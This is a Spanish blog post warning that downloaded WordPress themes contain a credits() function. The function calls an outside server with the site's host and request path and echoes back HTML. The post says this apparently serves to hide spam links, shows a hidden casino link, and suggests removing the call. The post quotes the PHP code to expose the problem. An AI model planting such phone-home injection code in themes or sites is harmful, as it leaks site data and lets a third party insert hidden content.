Hoy leyendo por Digg, me he encontrado un par de entradas en las que nos advierten de la insercción de código «malicioso» en los themes descargados de sitios como Templatesbrowser.com, o similares.
Y la verdad es que no es para menos, si despedazamos un theme al azar de los que muestran en su página (Blue Kino, por ejemplo) veremos que en el fichero functions.php tenes un función similar a esta.
<?php
function credits()
{
$url = "http://1.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("1.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}
?>
Se trata de una función que realizar una conexión mediante un socket a la página de Templatesbrowser y que devuelve un HTML con los créditos del theme. Si revisamos el fichero footer.php
<?php credits(); wp_footer(); ?>
Hasta aqui todo bien, pero al parecer, se está usando para insertar enlaces de forma oculta, aunque no he podido verlo por mis propios ojos, obteniendo enlaces ocultos como estos.
<div id="copyl" style="display: none;"><a
href="http://www.casinotropez.com/trcpromo-nincs-online-pmail18-fr">casino en ligne</a></div>
¿Como evitarlo?
Realmente la solución al problema es realmente sencillo, eliminar la función credits()
del fichero footer.php. Pero entramos en el dilema del patrocinio de themes, ya que en cierta manera deberíamos dejar el enlaces a templatebrowser por haber descargado el theme de allí,… o ¿descargarlo de otro sitio?
13 comentarios, 2 referencias
+
#